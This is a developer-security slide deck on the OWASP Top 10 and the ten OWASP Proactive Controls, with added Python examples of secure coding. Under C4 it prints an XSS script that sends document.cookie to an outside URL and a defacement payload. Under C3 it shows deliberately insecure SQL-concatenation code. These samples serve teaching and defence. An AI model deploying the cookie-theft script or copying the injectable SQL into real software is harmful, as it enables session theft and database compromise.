The ten things I wish every developer knew about #AppSec: The OWASP Proactive Controls
Chris Romeo, CEO, Security Journey
Copyright © Security Journey
About Chris Romeo
• CEO / Co-Founder @ Security Journey
• 22 years in the security world, CISSP, CSSLP
• Co-host of the AppSec Podcast (@AppSecPodcast)
• Co-Lead of the OWASP Triangle Chapter
@edgeroute
Agenda
• The state and size of the application security problem
• The ten things every developer must know
• Questions
State and size of the problem
(Apps) x (Attackers) x (Secure coding)
The reality of software security in 2019
1 in 4
49%
85%
of apps are found to contain at least one highly exploitable cross site scripting vulnerability.
vulnerabilities remain open over a year after first discovery.
of apps have at least one vulnerability in them.
Source: Veracode State of Software Security Volume 9
The cost of a security issue
Source: IBM Cost of Data Breach Study, 2018
Financial services is leading the pack
CAST analyzed 278 million lines of code from 1,388 applications and found 1.3 million CWE weaknesses in code developed under .NET and Java EE... with .NET code generally having a greater density of weaknesses than Java EE, in some cases with more than 35 CWE weaknesses per KLOC (1,000 lines of code).
A1:2017-Injection
A2:2017-Broken Authentication
A3:2017-Sensitive Data Exposure
A4:2017-XML External Entities (XXE)
A5:2017-Broken Access Control
A6:2017-Security Misconfiguration
A7:2017-Cross-Site Scripting (XSS)
A8:2017-Insecure Deserialization
A9:2017-Using Components with Known Vulnerabilities
A10:2017-Insufficient Logging & Monitoring
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
OWASP Proactive Controls
C1 Define Security Requirements
C2 Leverage Security Frameworks and Libraries
C3 Secure Database Access
C4 Encode and Escape Data
C5 Validate All Inputs
C6 Implement Digital Identity
C7 Enforce Access Control
C8 Protect Data Everywhere
C9 Implement Security Logging and Monitoring
C10 Handle All Errors and Exceptions
The mapping
OWASP Top 10 - 2017
A1:2017-Injection
A2:2017-Broken Authentication
A3:2017-Sensitive Data Exposure
A4:2017-XML External Entities (XXE)
A5:2017-Broken Access Control
A6:2017-Security Misconfiguration
A7:2017-Cross-Site Scripting (XSS)
A8:2017-Insecure Deserialization
A9:2017-Using Components with Known Vulnerabilities
A10:2017-Insufficient Logging & Monitoring
C1 Define Security Requirements
C2 Leverage Security Frameworks and Libraries
C3 Secure Database Access
C4 Encode and Escape Data
C5 Validate All Inputs
C6 Implement Digital Identity
C7 Enforce Access Control
C8 Protect Data Everywhere
C9 Implement Security Logging and Monitoring
C10 Handle All Errors and Exceptions
OWASP Proactive Controls is security information written for developers, by developers.
Why should you care?
C1 Define Security Requirements
Shift security left
The usefulness of security requirements
Guidance / best practice
Metrics
Procurement vehicle
Requirements
• Application Security Verification Standard (ASVS)
• 2.19, Verify there are no default passwords in use for the application framework or any components used by the application (such as "admin/password").
• 4.1, Verify that the principle of least privilege exists - users should only be able to access functions, data files, URLs, controllers, services, and other resources for which they possess specific authorization. This implies protection against spoofing and elevation of privilege.
User stories and misuse cases
User story
As a user, I can enter my username and password to gain access to the application.
User story
As a user, I can enter a long password that has a maximum of 1023 characters.
Misuse story
As an attacker, I can enter in a default username and password to gain access.
Four steps to successful use of security requirements
1. Discover/Select
2. Document
3. Implement
4. Confirm correctness
C2 Leverage security frameworks and libraries (and keep them updated)
Secure, reusable, and up-to-date components prevent vulnerability to third-party issues.
Leverage security frameworks and libraries
Do not reinvent the wheel
Use native, secure framework features
Stay up to date!
Best practices for libraries and frameworks
■ Only use trusted, actively maintained, widely used sources.
■ Inventory all third-party libraries.
■ Proactively keep libraries and components up to date.
■ Encapsulate libraries and expose only the required behaviour into your software.
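A minimal version of the "inventory" and "keep up to date" practices above, written in Python for this page as an added example (it is not code from the slides or from OWASP). It parses a pinned dependency list into an inventory and flags any pin older than a minimum safe version. Both the requirements text and the MIN_SAFE table are constructed sample data; a real check would take its minimum versions from an advisory feed or a software composition analysis tool.

```python
import re

# Constructed requirements.txt contents (not a real project's pins).
REQUIREMENTS = """\
# constructed requirements.txt
requests==2.19.1
flask==1.0.2
pyyaml==3.13
cryptography==2.6.1
"""

# Constructed "minimum safe version" table; in practice this comes from an
# advisory feed or SCA tool rather than a literal in the code.
MIN_SAFE = {"requests": "2.20.0", "pyyaml": "5.1", "cryptography": "2.6.1"}

# Only exact pins are accepted: without a pin there is nothing to compare.
PIN = re.compile(r"^\s*([A-Za-z0-9_.-]+)\s*==\s*([0-9][0-9.]*)\s*$")


def version_key(v: str) -> tuple:
    """Compare dotted numeric versions numerically, so 3.13 < 5.1."""
    return tuple(int(p) for p in v.split("."))


def inventory(text: str) -> dict:
    """Name -> pinned version for every dependency line (the inventory)."""
    inv = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        m = PIN.match(line)
        if not m:
            raise ValueError(f"unpinned or unparsable requirement: {line!r}")
        inv[m.group(1).lower()] = m.group(2)
    return inv


def outdated(inv: dict, min_safe: dict) -> list:
    """(name, pinned, minimum) for every pin below its minimum safe version."""
    return [(name, pinned, min_safe[name]) for name, pinned in inv.items()
            if name in min_safe and version_key(pinned) < version_key(min_safe[name])]


if __name__ == "__main__":
    inv = inventory(REQUIREMENTS)
    print("inventory:", inv)
    for name, pinned, minimum in outdated(inv, MIN_SAFE):
        print(f"UPDATE {name}: pinned {pinned}, minimum {minimum}")
```

Rejecting unpinned lines is deliberate: an inventory that cannot say which version is deployed cannot say whether it is current.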
C3 Secure Database Access
prevents SQL Injection
SQL Injection
INSECURE CODE
```java
// INSECURE: request parameters are concatenated straight into the SQL text,
// so whatever the caller sends becomes part of the statement.
String newName = request.getParameter("newName");
String id = request.getParameter("id");
String query = "UPDATE EMPLOYEES SET NAME=" + newName + " WHERE ID=" + id;
Statement stmt = connection.createStatement();
stmt.executeUpdate(query);
```
SECURE CODE
```java
// SQL: a PreparedStatement keeps the statement text fixed and binds the
// values separately, so they are always treated as data.
PreparedStatement pstmt = connection.prepareStatement(
        "UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
pstmt.executeUpdate();

// HQL: named parameters are bound the same way.
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
```
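The same update carried out in Python with the standard library's sqlite3 module, as an added example that is not part of the slides: the concatenated form and the bound-parameter form are run side by side on a name that contains an apostrophe. The EMPLOYEES table, its rows and the "O'Brien" input are constructed so the block runs offline.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory EMPLOYEES table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE EMPLOYEES (ID INTEGER PRIMARY KEY, NAME TEXT)")
    conn.executemany("INSERT INTO EMPLOYEES VALUES (?, ?)",
                     [(1, "Alice"), (2, "Bob"), (3, "Carol")])
    conn.commit()
    return conn


def rename_insecure(conn: sqlite3.Connection, emp_id: str, new_name: str) -> None:
    """INSECURE: mirrors the slide's string concatenation. The caller's text
    becomes part of the SQL, so a quote character changes the statement
    instead of being stored as data."""
    query = "UPDATE EMPLOYEES SET NAME='" + new_name + "' WHERE ID=" + emp_id
    conn.execute(query)
    conn.commit()


def rename_secure(conn: sqlite3.Connection, emp_id: str, new_name: str) -> None:
    """SECURE: the statement text is fixed and the values are bound
    (the Python equivalent of the slide's PreparedStatement with '?')."""
    conn.execute("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?", (new_name, emp_id))
    conn.commit()


def names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT NAME FROM EMPLOYEES ORDER BY ID")]


def demo() -> dict:
    """Run both variants on a legitimate name that happens to contain a quote
    and report what happened, as a dict so it can be checked in code."""
    awkward_name = "O'Brien"  # constructed input
    result = {}

    conn = make_db()
    try:
        rename_insecure(conn, "2", awkward_name)
        result["insecure_error"] = None
    except sqlite3.OperationalError as exc:  # the quote broke the SQL syntax
        result["insecure_error"] = type(exc).__name__
    result["insecure_names"] = names(conn)

    conn = make_db()
    rename_secure(conn, "2", awkward_name)
    result["secure_names"] = names(conn)
    return result


if __name__ == "__main__":
    print(demo())
```

The concatenated version fails even on honest input, which is the cheapest way to see why the statement text and the data must travel separately; the bound version stores the apostrophe verbatim.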
Secure database overview
Secure all the things
QUERIES
AUTHENTICATION
COMMUNICATION
CONFIGURATION
Mitigations
• Perform proper input validation
• Use a safe API
• Contextually escape user data
• Prepared statements with parameterized queries
C4 Encode and escape all output
prevents XSS
Anatomy of an XSS attack
Attack 1 : cookie theft
```html
<script>
var badURL = 'https://securityjourney.com/somesite/data=' + document.cookie;
var img = new Image();
img.src = badURL;
</script>
```
Attack 2 : Web site defacement
```html
<script>document.body.innerHTML='<blink>GO BAD PEOPLE</blink>';</script>
```
Contextual output encoding
Basic HTML Context
HTML Content Context
HTML Attribute context
CSS contexts
JavaScript Block context
JavaScript Variable context
Encode URL parameter values
Encode REST URL parameters
OWASP Java Encoder Project
HTML Contexts: Encode#forHtml, Encode#forHtmlContent, Encode#forHtmlAttribute, Encode#forHtmlUnquotedAttribute
XML Contexts: Encode#forXml, Encode#forXmlContent, Encode#forXmlAttribute, Encode#forXmlComment, Encode#forCDATA
JavaScript Contexts: Encode#forJavaScript, Encode#forJavaScriptAttribute, Encode#forJavaScriptBlock, Encode#forJavaScriptSource
CSS Contexts: Encode#forCssString, Encode#forCssUrl
URI/URL Contexts: Encode#forUri, Encode#forUriComponent
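To show what "contextual" means in practice, here is an added Python example (not code from the slides or from the OWASP Java Encoder) with one encoder per output context for four of the contexts listed above, and a template that applies the right encoder to each slot. The template, the profile values and the PAYLOAD string (modelled on the defacement script shown two slides back) are constructed; the encoders use only the standard library.

```python
import html
import json
from urllib.parse import quote


def for_html_content(s: str) -> str:
    """Text between tags: neutralize & < > " ' so no tag or entity can form."""
    return html.escape(s, quote=True)


def for_html_attribute(s: str) -> str:
    """Value inside a double-quoted attribute. Same character set as content;
    the attribute must still be written with quotes around it."""
    return html.escape(s, quote=True)


def for_javascript_string(s: str) -> str:
    """Value inside a quoted JavaScript string literal. json.dumps escapes
    quotes, backslashes and control characters; < > & are hex-escaped too so
    the HTML parser never sees '</script>' inside the block."""
    body = json.dumps(s)[1:-1]  # strip the surrounding quotes json.dumps adds
    return (body.replace("<", "\\u003c").replace(">", "\\u003e")
                .replace("&", "\\u0026"))


def for_uri_component(s: str) -> str:
    """Value used as a query-string parameter: percent-encode everything
    outside the unreserved set."""
    return quote(s, safe="")


def render_profile(display_name: str, site_url: str) -> str:
    """Apply the encoder that matches each slot of a constructed template."""
    return (
        "<h1>Hello, " + for_html_content(display_name) + "</h1>\n"
        '<a title="' + for_html_attribute(display_name) + '" '
        'href="/go?to=' + for_uri_component(site_url) + '">link</a>\n'
        '<script>var name = "' + for_javascript_string(display_name) + '";</script>'
    )


# Constructed input modelled on the defacement payload shown on the slide.
PAYLOAD = "<script>document.body.innerHTML='<blink>GO BAD PEOPLE</blink>';</script>"


def payload_is_inert(rendered: str) -> bool:
    """True when the only raw <script> tag in the page is the template's own
    and no raw tag from the input survived encoding."""
    return rendered.count("<script>") == 1 and "</blink>" not in rendered


if __name__ == "__main__":
    page = render_profile(PAYLOAD, "https://example.invalid/?q=a&b")
    print(page)
    print("inert:", payload_is_inert(page))
```

The point the slide makes is visible in the code: the same display name is encoded three different ways depending on where it lands, and an encoder chosen for the wrong slot (HTML escaping inside the JavaScript string, say) would leave that slot unprotected.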
C5 Validate all inputs
prevents XSS and Injection
Syntactical and semantic validity
Syntactical validity -> the data is in the expected form.
Select a four-digit "account ID". The application must check that the user data is EXACTLY four digits in length and consists only of numbers.
Semantic validity -> the data is within an acceptable range.
With a date range, a start date must be before the end date.
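The two checks described above, as an added Python example that is not part of the slides. Both are allow-list (white-list) checks meant to run server side; the account-ID strings and the date ranges in the cases list are constructed inputs, including a few that commonly slip past a loose check.

```python
import re
from datetime import date

# Exactly four ASCII digits. [0-9] rather than \d: \d also matches digits
# from other scripts (e.g. full-width digits), which is not "only numbers".
ACCOUNT_ID = re.compile(r"[0-9]{4}")


def validate_account_id(raw: str) -> str:
    """Syntactic validity: the whole string must be four digits, nothing else.
    fullmatch() anchors both ends, so a trailing newline cannot sneak past."""
    if not isinstance(raw, str) or not ACCOUNT_ID.fullmatch(raw):
        raise ValueError("account ID must be exactly four digits")
    return raw


def validate_date_range(start_raw: str, end_raw: str) -> tuple:
    """Syntactic check first (both values parse as ISO dates), then the
    semantic rule from the slide: the start date must be before the end."""
    try:
        start = date.fromisoformat(start_raw)
        end = date.fromisoformat(end_raw)
    except ValueError as exc:
        raise ValueError(f"dates must be ISO YYYY-MM-DD: {exc}") from None
    if not start < end:
        raise ValueError("start date must be before end date")
    return start, end


def check(fn, *args) -> str:
    """Run a validator and summarize the outcome as 'ok' or the rejection."""
    try:
        fn(*args)
        return "ok"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    cases = [  # constructed inputs
        (validate_account_id, "1234"),      # ok
        (validate_account_id, "12345"),     # too long
        (validate_account_id, "12a4"),      # non-digit
        (validate_account_id, "1234\n"),    # trailing newline
        (validate_account_id, "１２３４"),    # full-width digits, not [0-9]
        (validate_date_range, "2019-01-01", "2019-01-31"),  # ok
        (validate_date_range, "2019-01-31", "2019-01-01"),  # semantic failure
        (validate_date_range, "01/31/2019", "2019-02-01"),  # syntactic failure
    ]
    for fn, *args in cases:
        print(args, "->", check(fn, *args))
```

Syntactic validation decides whether the value is even the right kind of thing; semantic validation needs the parsed value and usually more than one field, which is why the date check parses first and compares second.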
The good and the bad
Black listing vs. white listing
Server side vs. client side
Libs and frameworks
■ Java: http://hibernate.org/validator/ and http://beanvalidation.org/
■ PHP's filter functions: https://secure.php.net/manual/en/filter.examples.validation.php
■ Ruby on Rails: http://edgeapi.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html
■ JavaScript: https://github.com/cure53/DOMPurify
C6 Implement Digital Identity
prevents broken authentication
Authentication data
Memorized Secrets
One-Time Passwords
Biometrics
Recovery keys
Cryptographic key
Factors of authentication
SOMETHING YOU KNOW
SOMETHING YOU HAVE
SOMETHING YOU ARE
Single
Two
Multi
C7 Enforce Access Control
prevents broken access control
Design principles for access control
1. Design thoroughly up front
2. Force all requests through access control checks
3. Deny by default
4. Follow principle of least privilege
5. Do not hardcode roles
6. Log all access control events
7. Eliminate development/debug backdoors in production code
Access control caution
Caution
• Good access control is hard to add to an application late in the lifecycle. Work hard to get this right up front, early on.
Verify
• Turnkey security tools cannot verify access control, since tools are not aware of your application's policy. Be prepared to do security unit testing and manual review for access control verification.
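An added Python example, not from the slides, of what the design principles on the previous slide look like in code: one central check every request passes through, deny by default, a policy table instead of role names scattered through business logic, and a log entry for every allow and every deny. The roles, permissions, users and the request sequence are constructed; the "security unit test" the caution slide asks for is the kind of assertion the sample run makes possible.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Policy lives in data, not in the code paths that use it: business logic
# asks for a permission, never "is this user an admin?".
POLICY = {
    "viewer": {"report:read"},
    "analyst": {"report:read", "report:export"},
    "admin": {"report:read", "report:export", "user:manage"},
}


@dataclass
class User:
    name: str
    roles: frozenset


@dataclass
class AccessControl:
    policy: dict
    events: list = field(default_factory=list)  # audit trail of every decision

    def is_allowed(self, user: User, permission: str) -> bool:
        """Deny by default: only an explicit grant in the policy returns True."""
        granted = set()
        for role in user.roles:
            granted |= self.policy.get(role, set())  # unknown role grants nothing
        decision = permission in granted
        self._log(user, permission, decision)
        return decision

    def _log(self, user: User, permission: str, allowed: bool) -> None:
        """Record both allows and denies with a UTC timestamp and the identity."""
        self.events.append({
            "ts": datetime.now(timezone.utc).isoformat(),
            "user": user.name,
            "permission": permission,
            "decision": "ALLOW" if allowed else "DENY",
        })


def handle(ac: AccessControl, user: User, action: str) -> str:
    """Single choke point: every request is checked before any work happens."""
    if not ac.is_allowed(user, action):
        return "403"
    return "200"


def run_sample() -> dict:
    """Drive a few constructed requests through the choke point."""
    ac = AccessControl(POLICY)
    alice = User("alice", frozenset({"viewer"}))
    bob = User("bob", frozenset({"analyst"}))
    mallory = User("mallory", frozenset({"superuser"}))  # role absent from policy
    return {
        "alice_read": handle(ac, alice, "report:read"),
        "alice_export": handle(ac, alice, "report:export"),
        "bob_export": handle(ac, bob, "report:export"),
        "mallory_manage": handle(ac, mallory, "user:manage"),
        "denials_logged": sum(e["decision"] == "DENY" for e in ac.events),
        "events_total": len(ac.events),
    }


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(key, value)
```

Because the policy is data, a role that exists nowhere in the table ("superuser") grants nothing, which is the deny-by-default principle doing its job without any special-case code.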
C8 Protect Data Everywhere
Encryption
Encryption Caution
Caution
• Protecting sensitive data at rest and in transit is painfully tough to build and maintain, especially for intranet infrastructure.
• Commit to long term plans to continually improve.
• Consider enterprise class solutions.
Verify
• Bring in heavy-weight resources to verify your cryptographic implementations, especially at rest.
Key lifecycle tips
1. Protect secret keys from unauthorized access.
2. Store keys in a proper secrets vault.
3. Use independent keys when multiple keys are required.
Key lifecycle tips (continued)
4. Build support for changing algorithms and keys when needed.
5. Build application features to handle key rotation.
Application secret management
• Don't store secrets in code or config files, and don't pass them through environment variables.
• Use tools like GitRob or TruffleHog to scan code repos for secrets.
• Keep keys and your other application-level secrets in a secrets vault like KeyWhiz, HashiCorp's Vault project, or Amazon KMS to provide secure storage and access to application-level secrets at run-time.
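Key lifecycle tips 3, 4 and 5 above are design features, not one-off settings, so here is an added Python example (not from the slides) of an HMAC token scheme that supports them: a separate key per purpose, a key ID carried in every token so the key behind it can change, and a rotation step that keeps older tokens verifiable until their key is retired. The in-memory KeyStore class is a stand-in for a real secrets vault; the key bytes are generated at run time rather than written into the code, and the "session" and "csrf" purposes and the payloads are constructed.

```python
import hashlib
import hmac
import secrets
from base64 import urlsafe_b64decode, urlsafe_b64encode
from typing import Optional


class KeyStore:
    """Stand-in for a vault: keys are looked up by purpose and key ID and
    never leave this object except through current()/get()."""

    def __init__(self) -> None:
        self._keys = {}     # (purpose, kid) -> key bytes
        self._current = {}  # purpose -> kid used for new tokens

    def add_key(self, purpose: str, kid: str) -> None:
        # Tip 3: each purpose gets its own independent random key.
        self._keys[(purpose, kid)] = secrets.token_bytes(32)

    def rotate(self, purpose: str, new_kid: str) -> None:
        """Tip 5: introduce a new key and make it current; older keys stay
        until retire() so tokens issued under them still verify."""
        self.add_key(purpose, new_kid)
        self._current[purpose] = new_kid

    def retire(self, purpose: str, kid: str) -> None:
        del self._keys[(purpose, kid)]

    def current(self, purpose: str) -> tuple:
        kid = self._current[purpose]
        return kid, self._keys[(purpose, kid)]

    def get(self, purpose: str, kid: str) -> Optional[bytes]:
        return self._keys.get((purpose, kid))


def _b64(b: bytes) -> str:
    return urlsafe_b64encode(b).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign(store: KeyStore, purpose: str, payload: bytes) -> str:
    """Tip 4: the token names the key ID it was made with, so keys (and later
    algorithms) can change without invalidating what is already issued."""
    kid, key = store.current(purpose)
    mac = hmac.new(key, kid.encode() + b"." + payload, hashlib.sha256).digest()
    return f"{kid}.{_b64(payload)}.{_b64(mac)}"


def verify(store: KeyStore, purpose: str, token: str) -> Optional[bytes]:
    """Return the payload if the MAC checks out under the named key, else None."""
    try:
        kid, payload_b64, mac_b64 = token.split(".")
        payload, mac = _unb64(payload_b64), _unb64(mac_b64)
    except ValueError:
        return None
    key = store.get(purpose, kid)
    if key is None:  # unknown or retired key ID
        return None
    expected = hmac.new(key, kid.encode() + b"." + payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, mac) else None


def rotation_walkthrough() -> dict:
    store = KeyStore()
    store.rotate("session", "k1")
    store.rotate("csrf", "c1")  # separate purpose, separate key
    old_token = sign(store, "session", b"user=42")
    store.rotate("session", "k2")  # rotation: new tokens use k2
    new_token = sign(store, "session", b"user=42")
    kid, _, mac_part = new_token.split(".")
    forged = f"{kid}.{_b64(b'user=43')}.{mac_part}"  # payload changed, MAC not
    out = {
        "old_still_valid_after_rotation": verify(store, "session", old_token) == b"user=42",
        "new_token_kid": kid,
        "session_token_rejected_by_csrf_keys": verify(store, "csrf", old_token) is None,
        "tampered_rejected": verify(store, "session", forged) is None,
    }
    store.retire("session", "k1")
    out["old_rejected_after_retire"] = verify(store, "session", old_token) is None
    return out


if __name__ == "__main__":
    print(rotation_walkthrough())
```

The key ID in the token is what makes rotation a routine operation instead of a breaking change; the purpose in the lookup is what stops a key issued for one job from being accepted for another.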
C9 Implement Security Logging and Monitoring
Mandatory for conclusive forensic investigation
Tips for proper application security logging
Follow a common logging format.
Keep timestamps consistent through time sync.
Always log the timestamp and identifying information.
Do not log private or confidential data.
Secure logging design
Encode and validate any dangerous characters before logging to prevent log injection or log forging attacks.
Protect log integrity: consider the permissions on log files and audit changes to the logs.
Forward logs from distributed systems to a central, secure logging service for centralized monitoring.
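A log-record builder that applies the tips from the previous two slides, written for this page as an added Python example (not code from the slides): one common line format, UTC timestamps, identifying fields on every record, a redaction list for private data, and escaping of control characters so a value containing a newline cannot forge a second record. The event values, the redaction key list and the crafted username are constructed.

```python
from datetime import datetime, timezone
from typing import Optional

REDACTED_KEYS = {"password", "token", "ssn", "card_number"}  # never written out


def neutralize(value: str) -> str:
    """Escape anything that could break the one-record-per-line format or
    imitate a field boundary: control characters, Unicode line separators,
    space, '=', '"' and backslash. This is the log-forging defence."""
    out = []
    for ch in value:
        code = ord(ch)
        if code < 0x20 or 0x7F <= code <= 0x9F or ch in ' "=\\\u2028\u2029':
            out.append(f"\\x{code:02x}" if code < 0x100 else f"\\u{code:04x}")
        else:
            out.append(ch)
    return "".join(out)


def format_event(event: str, user: str, source_ip: str, request_id: str,
                 extra: Optional[dict] = None, now: Optional[datetime] = None) -> str:
    """One record: ISO-8601 UTC timestamp followed by key=value pairs."""
    ts = (now or datetime.now(timezone.utc)).astimezone(timezone.utc)
    fields = {"event": event, "user": user, "src": source_ip, "request_id": request_id}
    for key, value in (extra or {}).items():
        fields[key] = "[REDACTED]" if key in REDACTED_KEYS else str(value)
    parts = [ts.isoformat(timespec="milliseconds")]
    parts += [f"{neutralize(k)}={neutralize(v)}" for k, v in fields.items()]
    return " ".join(parts)


def parse_lines(text: str) -> list:
    """Read records back: each physical line is exactly one record."""
    records = []
    for line in text.splitlines():
        if not line:
            continue
        ts, *pairs = line.split(" ")
        record = {"ts": ts}
        for pair in pairs:
            key, _, value = pair.partition("=")
            record[key] = value
        records.append(record)
    return records


def demo() -> list:
    fixed = datetime(2019, 10, 1, 12, 0, 0, tzinfo=timezone.utc)  # constructed
    # A constructed username that tries to look like a second, successful login.
    forged_user = "bob\n2019-10-01T12:00:01.000+00:00 event=login_ok user=admin"
    lines = "\n".join([
        format_event("login_failed", forged_user, "203.0.113.9", "req-1", now=fixed),
        format_event("login_ok", "alice", "203.0.113.10", "req-2",
                     extra={"password": "hunter2", "mfa": "totp"}, now=fixed),
    ])
    return parse_lines(lines)


if __name__ == "__main__":
    for record in demo():
        print(record)
```

Because the escaping is applied to every field, the crafted username stays inside its own record as an odd-looking value, which is exactly what an analyst wants to see; the password never reaches the line at all.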
C10 Handle all errors and exceptions
Stable applications.
Best practices for errors and exceptions
1. Manage exceptions in a centralized manner.
2. Avoid duplicated try/catch blocks in the code.
3. Ensure that all unexpected behaviors are correctly handled inside the application.
Best practices (continued)
4. Do not leak critical data in error messages, but provide verbose enough info to explain the issue.
5. Ensure that exceptions have enough information to assist Q/A, forensics or incident response teams.
6. Use the RESTful mechanism of standard HTTP response codes for errors.
Security concerns for exceptions
• Ensure the application fails securely under all circumstances, both expected and unexpected
• Use a centralized error strategy to reduce points of failure and promote consistency
• Log when exceptions are thrown and include sufficient detail for security auditing
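The three slides on errors describe one design, so here is a single added Python example (not code from the slides) of a centralized error strategy for a request pipeline: handlers raise, one choke point maps each failure to a standard HTTP status, the client gets a generic message plus a correlation ID, and the full detail (exception type, message, path, stack trace) goes to the log for forensics. The exception classes, the ACCOUNTS table, the handler and the requests are constructed; LOG_SINK is an in-memory list standing in for the real log so the outcome can be inspected.

```python
import logging
import traceback
import uuid
from typing import Callable

log = logging.getLogger("app")
LOG_SINK = []  # constructed in-memory sink standing in for the real log


class AppError(Exception):
    """Base class: carries the status and the only message a client may see."""
    status = 500
    public_message = "Internal error"


class NotFound(AppError):
    status = 404
    public_message = "Resource not found"


class Forbidden(AppError):
    status = 403
    public_message = "Access denied"


def handle_request(handler: Callable, request: dict) -> tuple:
    """Single choke point. Handlers raise; they never build error responses.
    Anything not an AppError is unexpected and still fails securely (500)."""
    try:
        return 200, handler(request)
    except AppError as exc:
        return _fail(exc.status, exc.public_message, exc, request)
    except Exception as exc:
        return _fail(500, AppError.public_message, exc, request)


def _fail(status: int, public_message: str, exc: Exception, request: dict) -> tuple:
    correlation_id = uuid.uuid4().hex
    LOG_SINK.append({  # the detail stays server-side, keyed by the ID
        "correlation_id": correlation_id,
        "status": status,
        "exception": type(exc).__name__,
        "detail": str(exc),
        "path": request.get("path"),
        "trace": traceback.format_exc(),
    })
    log.error("request failed id=%s status=%s exc=%s",
              correlation_id, status, type(exc).__name__)
    # The client sees the generic message and an ID to quote to support.
    return status, {"error": public_message, "correlation_id": correlation_id}


# Constructed data and handler
ACCOUNTS = {"42": {"owner": "alice", "balance": 10}}


def get_account(req: dict) -> dict:
    acct = ACCOUNTS.get(req["id"])
    if acct is None:
        raise NotFound(f"no account with id {req['id']!r}")
    if acct["owner"] != req["user"]:
        raise Forbidden(f"{req['user']} is not the owner of {req['id']}")
    return acct


def run_sample() -> dict:
    LOG_SINK.clear()
    return {
        "ok": handle_request(get_account, {"path": "/acct", "id": "42", "user": "alice"}),
        "missing": handle_request(get_account, {"path": "/acct", "id": "99", "user": "alice"}),
        "wrong_user": handle_request(get_account, {"path": "/acct", "id": "42", "user": "bob"}),
        "crash": handle_request(get_account, {"path": "/acct"}),  # KeyError -> 500
        "log_entries": len(LOG_SINK),
    }


if __name__ == "__main__":
    for key, value in run_sample().items():
        print(key, value)
```

The split between public_message and the logged detail is the whole point of tip 4: the account ID that does not exist appears in the log entry, never in the response, and the correlation ID is what ties a user's complaint back to that entry.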
Sources for additional study
2019 State of the Software Supply Chain: the 5th annual report on global open source software development
Key Takeaways
1. Recognize the size of the problem.
2. Teach developers the proactive controls and embed them in your software development approach.
C1 Define Security Requirements
C2 Leverage Security Frameworks and Libraries
C3 Secure Database Access
C4 Encode and Escape Data
C5 Validate All Inputs
C6 Implement Digital Identity
C7 Enforce Access Control
C8 Protect Data Everywhere
C9 Implement Security Logging and Monitoring
C10 Handle All Errors and Exceptions
Copyright © 2019 Security Journey
How to engage with Security Journey
1. Free trial of the Security Belt Program: https://app.securityjourney.com
2. Contact Chris: [email protected], @edgeroute
3. https://www.securityjourney.com/hi5
Resources
• OWASP Top 10 Project: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
• OWASP Java Encoder: https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
• OWASP Proactive Controls: https://www.owasp.org/index.php/OWASP_Proactive_Controls